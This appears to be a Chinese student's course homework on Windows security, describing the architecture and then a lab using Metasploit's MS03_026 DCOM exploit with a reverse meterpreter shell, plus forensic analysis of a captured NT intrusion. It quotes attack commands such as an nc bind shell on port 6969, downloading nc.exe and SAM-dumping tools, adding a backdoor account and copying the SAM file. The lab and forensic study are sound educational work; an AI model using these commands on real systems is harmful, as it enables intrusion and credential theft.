20199321 2019-2020-2 《网络攻防实践》第七周作业

1 实践内容

1.1 概述

Windows操作系统基本机构
- Windows操作系统内核的基本模块包括：Windows执行体、Windows内核体、设备驱动程序、硬件抽象层、Windows窗口与图形界面接口内核实现代码。
- Windows操作系统在用户代码的代码模块包括：系统支持进程、环境子系统服务进程、服务进程、用户应用软件、核心子系统DLL。
- Windows操作系统内核实现的核心机制：Windows进程和线程管理机制、Windows内存管理机制、Windows文件管理机制、Windows注册表管理机制、Windows的网络机制。

1.2 安全体系结构与机制

Windows操作系统基于引用监控器模型。
Windows身份认证机制：每个安全主体以时间和空间上全局唯一的SID安全标识进行标识。
- Windows为每个用户和计算机设置账户进行管理，账户权限的根本作用就是吸纳之这些账户内运行程序对系统资源对象的访问。Windows用户账户的口令经过加密处理后被保存于SAM或者活动目录AD中。
- Windows支持本地身份认证和网络身份认证。
- Windows身份认证实现原理
Windows授权与访问控制机制：由内核中的SRM模块与用户态的LSASS服务共同实施。认证通过后，会赋予用户访问令牌。
Windows对于系统中所有需要保护的资源抽象成对象，关联一个SD安全描述符。其中指明了
哪些主体可以以何种方式访问对象。
Windows安全审计机制中系统审计策略在本地安全策略中由系统管理员定义。

1.3 Windows远程安全攻防技术

1.4 Windows本地安全攻防技术

2 实践过程

2.1 Metasploit Windows Attack

查看各主机IP

主机	IP地址
kali(A)	192.168.200.9
Win2kServer(B)	192.168.200.124

使用命令msfconsole,打开metasploit环境。

搜索一下MS03_026漏洞search MS03_026，针对这个漏洞的渗透攻击模块。
使用这一渗透攻击模块。use exploit/windows/dcerpc/ms03_026_dcom。

设置攻击的载荷set PAYLOAD windows/meterpreter/reverse_tcp,然后查看需要配置的参数。

扫描二维码关注公众号，回复： 10795454 查看本文章

set RHOST 192.168.200.124,set LHOST 192.168.200.9设置攻击目标和攻击主机。
使用exploit,创建会话成功。

返回meterpreter,攻击成功，运行shell指令，来开启主机B的shell，并用ipconfig
指令查看执行情况。

2.2 解码一次成功的NT系统破解攻击

攻击者使用了什么破解工具进行攻击？

筛选出攻击机和靶机之间通信的包ip.addr == 213.116.251.162 && ip.addr == 172.16.1.106。
筛选http数据包：发现特殊的字符%C0%AF,判定为Unicode编码攻击

依据：Unicode漏洞的成因可大致归结为：从中文WindowsIIS4.0+SP6开始，还影响中文Windows 2000+IIS5.0、中文Windows 2000+IIS5.0+SP1。台湾繁体中文也同样存在这样的漏洞。它们利用扩展Unicode字符(如利用“../”取代“/”和 “\”)进行目录遍历漏洞。据了解，在WindowsNT中编码为%c1%9c，在Windows2000英文版中编码为%c0%af。

根据 “ADM!ROX!YOUR!WORLD”特征字符串，这次攻击应是由rain forest puppy 编写的 msadc(2).pl渗透攻击代码所发起的。针对msadcs.dll中RDS漏洞。

依据：

攻击者如何使用这个破解工具进入并控制了系统？

在 179 号数据包追踪 TCP 流，看到cmd /c echo user johna2k > ftpcom，创建ftpcom 脚本。

尝试使用ftpcom 脚本从ftp服务器下载编写好的后门文件，但并没有成功。

几次尝试后，在1106数据包终于登陆成功，在此追踪 TCP 流
成功下载下载了nc.exe，pdump.exe，samdump.dll三个文件

查看到 1224 号数据包，指令cmd1.exe /c nc -l -p 6969 -e cmd1.exe。
利用Unicode漏洞并通过nc.exe构建了一个远程shell通道，端口6969。

攻击者通过端口6969进入，并可以控制系统。

攻击者获得系统访问权限后做了什么？

已知攻击者是通过6969号端口进入的，那就先过滤出进出6969号端口的数据包:tcp.port == 6969。
追踪数据流。

dir  
dir
.[Adir
dir
del ftpcom //删除文件
ls.
dir
type readme.e //查看文件的内容
c:.
cd\
dir
rm ..
del fun
dir
cd exploites
dir
cd exploits
dir
cd microsoft
dir
cd ..
cd newfiles
dir
cd ..
cd unix
dir
cd ..
dir
cd ..
dir
dir
dir'
dir
cat yay //查看文件内容，但没有成功，改成使用type命令
type yay. //此处还输错文件名
type yay.txt
net session //尝试列出会话，但因为权限问题被拒绝
net users //列出用户
dir
type yay2.txt
del yay2.txt
net session >>yay3.txt
dir
del yay&.*
dir
del yay*
del yay3.txt
dir
dir
yuper .....
type heh.txt
del heh.txt
cd program files
dir
cd ..
dir
echo Hi, i know that this a ..is a lab server, but patch the holes! :-) >>README.NOW.Hax0r  //发了一个 echo 消息到 C 盘根目录文件 README.NOW.Hax0r：
dir
dir
net group
net localgroup
net group domain admins
.[Anet group /?
net group ??
net group /?
net group 
net localgroup
net localgroup /domain admins
net localgroup domain admins
net users
net session
.[A.[A.[Anet localgroup domain admins
net group domain admins
net localgroup administrators
.[Anet localgroup administrators
net localgroup administrators
net session
dir
cd program files
dir
cd common files
dir
cd obdc
dir
cd microsoft shadr..red
cd microsoft shared
dir
cd ..
cd odbc
dir
cd data dou
cd data sources
dir
cd..
cd ..
dir
cd system
dir
cd msads
dir
cd msas.dcs
cd msadc
dir
psu
pdump
net start //查看开启了哪些服务 
net localgroup administrators   //添加到管理员中使其具有管理员权限
dir..
net users
net users
net users /?
net users hi guy /ADD
/net..
netnet password //更改系统登陆密码 
net user
net user /?
net user himan HarHar666 /ADD  //建立用户
net name
net user
net user Administrator
cd /winnt
dir
cd \winnt
cd C:\Program Files\Common Files\System\msadc
del c
del samdump.dll
del pdump.exe
del 
cd\winnt
cd resp..
cd repair
dir
rdisk -s/
d.rd
rdisk -/s
dir
rdisk // 备份关键系统信息，在 /repair 目录中就会创建一个名为 sam._ 的 SAM 压缩拷贝，并且攻击者把这个文件拷贝到 har.txt 并打印。以下可以看到。
rdisk -s
dir
cat 
type sam._ 
dir
dir
dir
dir
dir
dir
dir
c:
dir
cd\
dir
type har.txt
......dir
......dir
......cd wiretrip
......exit...
......exit
......